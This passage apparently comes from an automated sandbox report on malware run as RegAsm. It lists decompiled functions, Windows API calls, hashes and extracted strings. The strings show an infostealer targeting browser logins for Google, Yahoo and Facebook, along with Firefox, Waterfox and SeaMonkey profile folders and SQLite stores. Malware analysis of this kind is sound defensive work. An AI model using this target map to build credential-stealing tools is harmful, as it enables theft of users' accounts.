                                                                                                                                                                                                                        • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                                                                                                                                      • _wcslwr.MSVCRT ref: 0040C817
                                                                                                                                                                                                                        • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                                                                                                                                                                                        • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                                                                                                                                                                                      • wcslen.MSVCRT ref: 0040C82C
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$free$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                                                                                                                                                                                      • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                                                                                                                                                                                      • API String ID: 2936932814-4196376884
                                                                                                                                                                                                                      • Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                                                                                                                                                      • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                                                                                                                                                                                                                      Function 00403C9C Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403CBF
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403CD4
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403CE9
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403CFE
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403D13
                                                                                                                                                                                                                        • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                                                        • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                                                                        • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                                                        • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                                                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                                                                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                                                                                                        • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403DDA
                                                                                                                                                                                                                        • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                                                                        • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                                                                                                                                                      • String ID: Waterfox$Waterfox\Profiles
                                                                                                                                                                                                                      • API String ID: 4039892925-11920434
                                                                                                                                                                                                                      • Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                                                                                                                                                      • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                                                                                                                                                                                                      Function 00403E2D Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403E50
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403E65
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403E7A
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403E8F
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403EA4
                                                                                                                                                                                                                        • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                                                        • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                                                                        • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                                                        • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                                                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                                                                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                                                                                                        • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403F6B
                                                                                                                                                                                                                        • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                                                                        • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                                                                                                                                                      • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                                                                                                                                                                                      • API String ID: 4039892925-2068335096
                                                                                                                                                                                                                      • Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                                                                                                                                                                      • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                                                                                                                                                                                                      Function 00403FBE Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403FE1
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403FF6
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040400B
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00404020
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00404035
                                                                                                                                                                                                                        • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                                                        • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                                                                        • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                                                        • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                                                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                                                                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                                                                                                        • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004040FC
                                                                                                                                                                                                                        • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                                                                        • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                                                                                                                                                      • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                                                                                                                                                                                      • API String ID: 4039892925-3369679110
                                                                                                                                                                                                                      • Opcode ID: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                                                                                                                                                                      • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                                                                                                                                                                                                      Function 00444432 Relevance: 10.7, APIs: 1, Strings: 6, Instructions: 217COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memcpy.MSVCRT(00000048,00451D40,0000002C,000003FF,00445FAE,?,00000000,?,0040B879), ref: 004444E3
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy
                                                                                                                                                                                                                      • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                                                                                                                                                                                      • API String ID: 3510742995-2641926074
                                                                                                                                                                                                                      • Opcode ID: 94510af7901ecd36673df76512f8cc8f4b4749faf5a93beda853377b65ea3140
                                                                                                                                                                                                                      • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 94510af7901ecd36673df76512f8cc8f4b4749faf5a93beda853377b65ea3140
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                                                                                                                                                                                                      Function 0041837F Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 140fileCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • CreateFileW.KERNEL32(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0041847E
                                                                                                                                                                                                                      • free.MSVCRT ref: 0041848B
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CreateErrorFileLastfree
                                                                                                                                                                                                                      • String ID: |A
                                                                                                                                                                                                                      • API String ID: 981974120-1717621600
                                                                                                                                                                                                                      • Opcode ID: b6fac9d43bc75127802d1a393ff5c3575377eb3b1acc0c55043375108e40dc75
                                                                                                                                                                                                                      • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b6fac9d43bc75127802d1a393ff5c3575377eb3b1acc0c55043375108e40dc75
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96
                                                                                                                                                                                                                      Function 004032B4 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 119COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                                                                                                                                        • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                                                                                                                                                                                        • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004033B7
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,0000121C), ref: 004033D0
                                                                                                                                                                                                                      • wcscmp.MSVCRT ref: 004033FC
                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 00403439
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$_wcsicmpfreememcpywcscmpwcsrchr
                                                                                                                                                                                                                      • String ID: $0.@
                                                                                                                                                                                                                      • API String ID: 2758756878-1896041820
                                                                                                                                                                                                                      • Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                                                                                                                                                                      • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                                                                                                                                                                                                      Function 00403BED Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 57COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403C09
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403C1E
                                                                                                                                                                                                                        • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                                                        • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                                                                                                                                                                                        • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                                                                                                                                                                                      • wcscat.MSVCRT ref: 00403C47
                                                                                                                                                                                                                        • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                                                                        • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                                                        • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                                                      • wcscat.MSVCRT ref: 00403C70
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memsetwcscat$CloseFolderPathSpecialwcscpywcslen
                                                                                                                                                                                                                      • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                                                                                                                                                                      • API String ID: 1534475566-1174173950
                                                                                                                                                                                                                      • Opcode ID: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                                                                                                                                                                      • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                                                                                                                                                                                                      Function 0040A804 Relevance: 9.0, APIs: 6, Instructions: 40libraryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 669240632-0
                                                                                                                                                                                                                      • Opcode ID: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                                                                                                                                                                      • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                                                                                                                                                                                                      Function 00414C2E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 77registryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00414C87
                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                                                        • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CloseFolderPathSpecialVersionmemsetwcscpy
                                                                                                                                                                                                                      • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                                                                                                                      • API String ID: 2925649097-2036018995
                                                                                                                                                                                                                      • Opcode ID: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                                                                                                                                                                      • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                                                                                                                                                                                                      Function 0041443E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • wcschr.MSVCRT ref: 00414458
                                                                                                                                                                                                                      • _snwprintf.MSVCRT ref: 0041447D
                                                                                                                                                                                                                      • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                                                                                                                                                                                      • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                                                                                                                                                      • String ID: "%s"
                                                                                                                                                                                                                      • API String ID: 1343145685-3297466227
                                                                                                                                                                                                                      • Opcode ID: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                                                                                                                                                                      • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                                                                                                                                                                                                      Function 004087B3 Relevance: 7.7, APIs: 6, Instructions: 190COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004087D6
                                                                                                                                                                                                                        • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                                                                                                        • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00408828
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00408840
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00408858
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00408870
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00408888
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2911713577-0
                                                                                                                                                                                                                      • Opcode ID: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                                                                                                                                                                      • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                                                                                                                                                                                                      Function 0041F1A5 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 165COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcmp
                                                                                                                                                                                                                      • String ID: @ $SQLite format 3
                                                                                                                                                                                                                      • API String ID: 1475443563-3708268960
                                                                                                                                                                                                                      • Opcode ID: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                                                                                                                                                                      • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                                                                                                                                                                                                      Function 004110DC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 68COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
